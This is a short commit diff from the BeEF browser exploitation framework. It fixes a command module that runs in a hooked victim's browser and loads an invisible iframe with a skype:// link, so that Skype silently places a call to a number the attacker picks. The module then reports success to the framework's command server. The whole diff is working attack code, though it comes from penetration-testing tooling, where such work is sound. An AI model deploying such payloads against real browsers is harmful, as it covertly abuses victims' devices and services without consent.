issue 269: corrected the skype handler. Now works great on Firefox and Chrome. Still don't work on Safari.
git-svn-id: https://beef.googlecode.com/svn/trunk@792 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
@@ -1,5 +1,5 @@
|
||||
beef.execute(function() {
|
||||
var sploit = beef.dom.createInvisibleIframe();
|
||||
sploit.src = 'skype:<%= @tel_num %>?cal';
|
||||
sploit.src = 'skype://<%= @tel_num %>?call';
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
|
||||
});
|
||||
|
||||
Reference in New Issue
Block a user